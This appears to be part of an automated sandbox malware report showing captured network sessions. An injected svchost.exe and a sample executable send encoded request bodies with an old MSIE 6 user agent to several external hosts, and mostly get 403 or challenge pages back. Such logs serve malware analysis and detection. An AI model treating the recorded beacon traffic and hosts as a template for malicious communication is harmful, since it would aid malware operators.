                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1221INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                        Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1236INData Raw: 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 20 20 2d 2d 0d 0a 32 30 30 30 0d 0a 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 0d 0a 20 20 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 20 61 6b 74 75 61 6c
                                                                                                                                                                                                                                                                        Data Ascii: </div> </div> </article> </section> </section></div>... topnews. -->... content --2000><div id="content"> ... content-left --> <article id="wtxt" class="mainLeft"> ... aktual
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1252INData Raw: 74 3a 31 37 39 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2c 5a 6f 73 74 61 6e 2d 6a 65 64 6e 79 6d 2d 7a 2d 6e 61 73 2d 50 52 41 43 41 2d 57 2d 50 4f 4c 49 43 4a 49 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2e 6a 70 67 3f 0d 0a 32 30 30 30 0d 0a 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 5a 6f 73 74 61 c5 84 20 6a 65 64 6e 79 6d 20 7a 20 6e 61 73 20 2d 20 50 52 41 43 41 20 57 20 50 4f 4c 49 43 4a 49 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22
                                                                                                                                                                                                                                                                        Data Ascii: t:179px;margin-bottom:10px"><a href="/w20/batony/4596,Zostan-jednym-z-nas-PRACA-W-POLICJI.html" target="_top"><img src="/dokumenty/batony/4596.jpg?2000v=1657112618" alt="Zosta jednym z nas - PRACA W POLICJI" /></a></div><div class="item"
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1268INData Raw: 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 66 6f 6f 74 65 72 3e 0d 0a 20 20 20 20 20 20 3c 21 2d 2d 20 66 6f 6f 74 65 72 20 2e 2d 2d 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2d 2d 3e 0d 0a 20 20 09 3c 64 69 76 20 69 64 3d 22 62 61 63 6b 2d 74 6f 2d 74 6f 70 22 3e 3c 61 20 68 72 65 66 3d 22 23 70 61 67 65 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 0d 0a 61 34 0d 0a 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 50 6f 77 72 c3 b3 74 20 6e 61 20 67 c3 b3 72 c4 99 20 73 74 72 6f 6e 79 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 20 20 09 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2e 2d 2d 3e 20 0d 0a 20 20 20
                                                                                                                                                                                                                                                                        Data Ascii: </div> </footer> ... footer .--> </div> ... GoToTop --> <div id="back-to-top"><a href="#page"><span></span><span a4class="sr-only">Powrt na gr strony</span></a></div> ... GoToTop .-->


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        8192.168.2.652648138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:13 UTC145OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: www.diamir.de
                                                                                                                                                                                                                                                                        Content-Length: 3856
                                                                                                                                                                                                                                                                        2023-03-10 06:56:13 UTC145OUTData Raw: 69 57 73 2f 68 5a 79 6d 71 61 75 74 73 4c 4b 30 74 37 6d 38 78 4d 6a 4c 7a 74 47 36 79 32 44 65 5a 76 65 52 4c 6a 79 7a 44 42 72 2b 66 56 6d 71 31 74 6d 63 30 64 6f 62 53 4c 57 34 55 73 5a 4d 63 71 37 52 5a 2f 61 47 69 76 70 79 66 78 64 67 32 74 74 5a 52 49 56 32 42 38 4f 6c 7a 79 59 61 31 34 48 4f 79 61 49 59 41 75 67 4e 78 77 68 2f 4c 34 4f 4c 45 73 30 53 56 7a 37 34 62 34 43 2f 6f 48 4c 71 79 48 66 68 6c 32 53 78 57 7a 4e 4a 53 31 73 57 43 46 4b 39 44 32 37 69 45 44 52 48 73 75 67 66 35 4f 7a 7a 50 50 70 59 64 48 58 37 78 45 2b 4b 44 50 6c 72 32 78 75 64 77 6d 66 6d 52 37 34 6a 77 66 56 71 58 45 33 43 6e 6c 76 69 30 6f 50 42 4d 69 4e 49 66 2f 63 79 37 4d 51 54 52 5a 55 39 45 77 44 63 44 71 46 4c 46 44 42 6b 59 51 64 2f 70 65 52 33 46 64 77 68 2f 6c 62
                                                                                                                                                                                                                                                                        Data Ascii: iWs/hZymqautsLK0t7m8xMjLztG6y2DeZveRLjyzDBr+fVmq1tmc0dobSLW4UsZMcq7RZ/aGivpyfxdg2ttZRIV2B8OlzyYa14HOyaIYAugNxwh/L4OLEs0SVz74b4C/oHLqyHfhl2SxWzNJS1sWCFK9D27iEDRHsugf5OzzPPpYdHX7xE+KDPlr2xudwmfmR74jwfVqXE3Cnlvi0oPBMiNIf/cy7MQTRZU9EwDcDqFLFDBkYQd/peR3Fdwh/lb
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC149INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:14 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 548
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC149INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        80192.168.2.657019138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1185OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: www.diamir.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1219INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:19 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 548
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1219INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        81192.168.2.657041188.114.96.3443C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1269OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: sigtoa.com
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:20 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lHyhJy9VamOY6NEeXnLVrla%2BPIXJFKHB%2FR7OdmQZLrsMikvKUKZIYRPhcVRUBZG8C77ndDbhC1B%2BFOAsHAPxHSr6hEB96r0ASihZxO5o6LDQc5nYiBNmEkBebMVy"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a83d89029bf4-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1287INData Raw: 31 65 62 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78
                                                                                                                                                                                                                                                                        Data Ascii: 1ebc<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta name="robots" content="noindex
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1292INData Raw: 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 20 68 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 63 6c
                                                                                                                                                                                                                                                                        Data Ascii: th,initial-scale=1"> <link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"> </head><body class="no-js"> <div class="main-wrapper" role="main"> <div class="main-content"> <h1 class="zone-name-title h1"> <img cl
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1294INData Raw: 6e 3d 22 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 66 5f 74 6b 3d 6b 69 78 6c 36 64 76 63 65 6d 7a 76 75 46 42 59 41 45 6e 42 4e 57 37 57 5f 35 2e 73 63 70 59 47 71 63 36 72 44 4d 52 57 71 41 38 2d 31 36 37 38 34 33 31 33 38 30 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 52 41 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 65 6e 63 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6d 64 22 20 76 61 6c 75 65 3d 22 42 6e 49 6d 4d 4a 6f 4a 6d 36 70 78 2e 51 77 61 42 7a 65 32 46 6a 75 48 46 5f 76 7a 38 59 54 65 47 61 58 6b 70 76 64 47 55 46 6f 2d 31 36 37 38 34 33 31 33 38 30 2d 30 2d
                                                                                                                                                                                                                                                                        Data Ascii: n="/?__cf_chl_f_tk=kixl6dvcemzvuFBYAEnBNW7W_5.scpYGqc6rDMRWqA8-1678431380-0-gaNycGzNCRA" method="POST" enctype="application/x-www-form-urlencoded"> <input type="hidden" name="md" value="BnImMJoJm6px.QwaBze2FjuHF_vz8YTeGaXkpvdGUFo-1678431380-0-
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1296INData Raw: 6a 2d 4a 43 6c 47 4c 70 42 78 5a 41 4f 55 78 52 56 4e 4b 61 63 47 6d 65 6c 57 45 31 73 72 5a 41 46 70 6e 55 49 73 52 57 34 50 6e 30 62 35 61 6f 45 70 76 6b 72 67 5a 45 4c 31 36 41 52 68 65 47 2d 78 33 34 4b 42 53 48 45 45 6c 77 57 77 44 4a 54 42 47 63 54 35 4a 7a 76 78 66 71 32 64 77 5a 6b 5f 74 6e 57 66 44 42 2d 70 78 4d 6a 4e 37 39 5f 72 35 63 64 4c 7a 77 52 4c 68 76 50 6c 6f 30 72 64 2d 6a 30 4f 6c 6d 2d 42 4b 2d 45 77 36 38 5f 77 70 55 69 4e 74 33 5f 36 6b 62 55 72 49 6f 37 64 49 54 76 56 71 68 35 65 46 57 46 50 49 4c 78 41 45 62 78 56 47 69 4a 64 70 44 37 5f 57 78 79 41 39 53 31 6b 54 41 33 42 30 55 46 79 47 4e 34 53 43 32 58 32 64 4f 39 49 70 66 57 57 5f 68 47 68 46 6c 47 78 76 64 46 63 7a 4f 77 45 45 6e 65 6f 45 67 75 67 73 6f 2d 63 6e 35 30 64 4e
                                                                                                                                                                                                                                                                        Data Ascii: j-JClGLpBxZAOUxRVNKacGmelWE1srZAFpnUIsRW4Pn0b5aoEpvkrgZEL16ARheG-x34KBSHEElwWwDJTBGcT5Jzvxfq2dwZk_tnWfDB-pxMjN79_r5cdLzwRLhvPlo0rd-j0Olm-BK-Ew68_wpUiNt3_6kbUrIo7dITvVqh5eFWFPILxAEbxVGiJdpD7_WxyA9S1kTA3B0UFyGN4SC2X2dO9IpfWW_hGhFlGxvdFczOwEEneoEgugso-cn50dN
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1297INData Raw: 63 52 61 79 3a 20 27 37 61 35 39 61 38 33 64 38 39 30 32 39 62 66 34 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 48 61 73 68 3a 20 27 31 66 66 35 32 38 33 61 30 33 30 65 32 35 36 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 6b 69 78 6c 36 64 76 63 65 6d 7a 76 75 46 42 59 41 45 6e 42 4e 57 37 57 5f 35 2e 73 63 70 59 47 71 63 36 72 44 4d 52 57 71 41 38 2d 31 36 37 38 34 33 31 33 38 30 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 52 41 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 46 50 57 76 3a 20 27 67 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 54 54 69 6d 65 4d 73 3a 20 27 31 30 30 30 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 4d 54 69 6d 65 4d 73 3a 20 27 30 27 2c 0a 20 20
                                                                                                                                                                                                                                                                        Data Ascii: cRay: '7a59a83d89029bf4', cHash: '1ff5283a030e256', cUPMDTk: "\/?__cf_chl_tk=kixl6dvcemzvuFBYAEnBNW7W_5.scpYGqc6rDMRWqA8-1678431380-0-gaNycGzNCRA", cFPWv: 'g', cTTimeMs: '1000', cMTimeMs: '0',
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1300INData Raw: 37 4a 45 56 4d 2b 51 30 76 58 31 32 4f 41 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 32 3a 20 27 2b 69 38 79 38 47 78 63 4c 6c 72 64 75 35 71 6f 53 6b 64 74 52 67 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7a 68 3a 20 27 64 4c 68 39 34 5a 58 4c 73 4d 61 54 6f 47 44 33 2f 71 39 42 69 75 6d 61 63 36 79 78 51 56 55 5a 34 63 32 6a 74 34 59 4a 6e 61 55 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 68 3a 20 27 66 78 75 35 2f 69 51 76 50 2f 7a 6e 41 4c 39 38 63 46 50 70 7a 30 44 6a 72 6d 45 33 6f 34 34 57 4d 64 5a 72 36 61 5a 51 52 73 51 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 68 3a 20 27 6a 57 32 78 52 42 73 71 57 31 76 4c 74 75 42 6f 6f 58 39 61 4b 6d 45 44 32 63 5a 68 41 4c 37
                                                                                                                                                                                                                                                                        Data Ascii: 7JEVM+Q0vX12OA==', i2: '+i8y8GxcLlrdu5qoSkdtRg==', zh: 'dLh94ZXLsMaToGD3/q9Biumac6yxQVUZ4c2jt4YJnaU=', uh: 'fxu5/iQvP/znAL98cFPpz0DjrmE3o44WMdZr6aZQRsQ=', hh: 'jW2xRBsqW1vLtuBooX9aKmED2cZhAL7
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1304INData Raw: 4f 67 55 48 61 73 68 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 70 6f 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 6f 67 55 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 70 6f 29 3b 0a 20 20 20 20 7d 28 29 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 22 20 72 6f 6c 65 3d 22 63 6f 6e 74 65 6e 74 69
                                                                                                                                                                                                                                                                        Data Ascii: OgUHash); cpo.onload = function() { history.replaceState(null, null, ogU); }; } document.getElementsByTagName('head')[0].appendChild(cpo); }());</script> <div class="footer" role="contenti
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1306INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        82192.168.2.65699649.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1311OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: nts-web.net
                                                                                                                                                                                                                                                                        Content-Length: 5372
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1311OUTData Raw: 70 59 43 48 36 61 32 31 75 4c 71 38 76 73 48 44 78 63 6a 4b 7a 4d 2f 52 30 39 57 52 32 6f 4b 4c 36 4e 57 2f 46 36 6a 2f 50 38 76 49 6d 4c 43 32 76 61 6c 5a 5a 74 57 43 6b 4a 30 71 75 48 4e 66 50 58 69 77 77 54 65 2f 77 62 6f 38 47 46 68 55 41 6d 43 51 33 4d 43 61 69 42 6a 78 65 7a 52 4c 5a 53 63 59 38 47 57 6d 7a 41 5a 32 4c 4b 75 45 51 30 75 4c 44 35 2f 71 76 4d 64 56 6a 77 37 54 62 34 37 70 4c 70 6e 6c 57 31 75 37 4d 74 78 42 69 53 62 34 4a 55 68 41 5a 59 72 6f 6d 6e 65 54 35 77 33 51 69 78 76 4b 43 4a 37 4e 79 50 32 73 5a 6b 47 33 70 6c 32 79 46 30 38 75 43 66 72 4c 4c 63 6c 7a 54 63 44 77 77 31 69 32 74 5a 59 4c 31 4e 43 4d 45 4c 41 61 71 4d 6f 6d 74 56 65 34 47 73 50 48 6b 63 43 50 4d 4b 62 4a 73 66 4f 34 35 76 44 33 64 38 67 51 4c 79 36 33 61 4a 61
